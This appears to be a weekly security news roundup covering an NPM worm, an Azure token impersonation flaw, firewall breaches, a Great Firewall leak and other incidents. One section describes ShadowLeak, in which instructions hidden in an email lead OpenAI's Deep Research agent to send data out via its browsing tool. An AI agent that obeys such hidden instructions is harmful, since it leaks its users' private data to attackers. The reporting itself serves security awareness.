Hardly a week goes by that there isn’t a story to cover about malware getting published to a repository. Last week it was millions of downloads on NPM, but this week it’s something much more concerning. Malware published on NPM is now looking for NPM tokens, and propagating to other NPM packages when found. Yes, it’s a worm, jumping from one NPM package to another, via installs on developer machines.

It does other things too, like grabbing all the secrets it can find when installed on a machine. If the compromised machine has access to a Github account, a new repo is created named Shai-Hulud, borrowed from the name of the sandworms from Dune. The collected secrets and machine info gets uploaded here, and a workflow also uploads any available GitHub secrets to the webhook.site domain.

How many packages are we talking about? At least 187, with some reports of over 500 packages compromised. The immediate attack has been contained, as NPM has worked to remove the compromised packages, and apparently has added filtering code that blocks the upload of compromised packages.

So far there hasn’t been an official statement on the worm from NPM or its parent companies, GitHub or Microsoft. Malicious packages uploaded to NPM is definitely nothing new. But this is the first time we’ve seen a worm that specializes in NPM packages. It’s not a good step for the trustworthiness of NPM or the direct package distribution model.

Token Impersonation in Azure

There’s an interesting write-up from [Dirk-jan Mollema] detailing his findings regarding Azure impersonation tokens and how to abuse them. This is about the Entra ID service, the identity and access management component of the Azure cloud. Azure has a function that allows a service like Exchange to generate an actor token, allowing the service to interact with the rest of Azure on behalf of a user.

These tokens are just signed JSON Web Tokens (JWTs). For a service to actually use one of these tokens, it’s embedded inside yet another, unsigned JWT. This outer token container has multiple fields indicating the the tenant that signed the inner token and the tenant the request is intended for. You may already wonder, what happens if we could get our hands on one of these double-wrapped tokens, and manipulate the target tenant field?

If an attacker can discover the tenant ID and a valid netId for a user in the victim tenant, one of these impersonation tokens could be generated from the attacker-owned tenant, and then manipulated to point to the victim tenant. From there, the attacker could perform any action as that user. It was an extremely significant flaw, and Microsoft pushed an immediate patch within days. The CVE scores a perfect 10 base score in the CVSS 3.1 scale.

ShadowLeak and Prompt Injection, the Attack That Won’t Go Away

There’s yet another example of weaponizing prompt injections against LLMs, in the form of ShadowLeak. And again, it’s the case where agentic AI can fall to social engineering.

The setup is that the AI is handling incoming emails, and the prompt is hidden inside an incoming email, perhaps as white text on a white background. The real challenge here isn’t sneaking the prompt in, but how to exfiltrate data afterwards. OpenAI’s Deep Research agent includes browser.open, to allow the AI to interact with the Internet. And of course, this gives the agent the ability to send data to a remote endpoint.

Firewall Warnings

SonicWall has announced that their MySonicWall systems were breached, and customers have been warned that their firewall configuration backups may have been compromised. These backups appear to include passwords.

Watchguard Firebox firewalls have an out-of-bounds write that can allow Remote Code Execution (RCE) on firewalls running VPNs with IKEv2. A fix is available for the units that are still actively supported, and it’s possible to mitigate against the flaw.

Inside The Great Wall

There was a huge, 600 GB leak last week, of source code and information about the Great Firewall of China. If you click through, the 600 GB leak is available to download, but it’s not something to download and interact with lightly. Put simply, it’s a lot of data produced by level state-sponsored actors, dealing with rather sensitive capabilities.

Among the non-source files, there are some interesting details, such as how the Chinese firewall has been exported to multiple other countries. The source code itself is still being analyzed, and so far it’s an interesting look into the cat and mouse game that has been long played between the Chinese government and VPN technologies. This leak will likely take quite some time to fully analyze, but promises to provide a significant look into the internals of the Great Firewall.

Bits and Bytes

LG TVs running WebOS had a fun issue, where plugging in a USB drive exposed the files on a web endpoint. The filename to download is specified via a parameter to that url, and that parameter doesn’t do path traversal filtering. This gives arbitrary read access to the whole device filesystem.

Google has uncovered and then squashed the SlopAds advertising fraud campaign. This campaign was a collection of apps that presented themselves as hastily made, “AI slop” apps. But when installed, these apps clicked as fast as they could on ads that paid out for the attackers. This represents 224 malicious applications removed, and was resulting in 2.3 billion ad hits per day.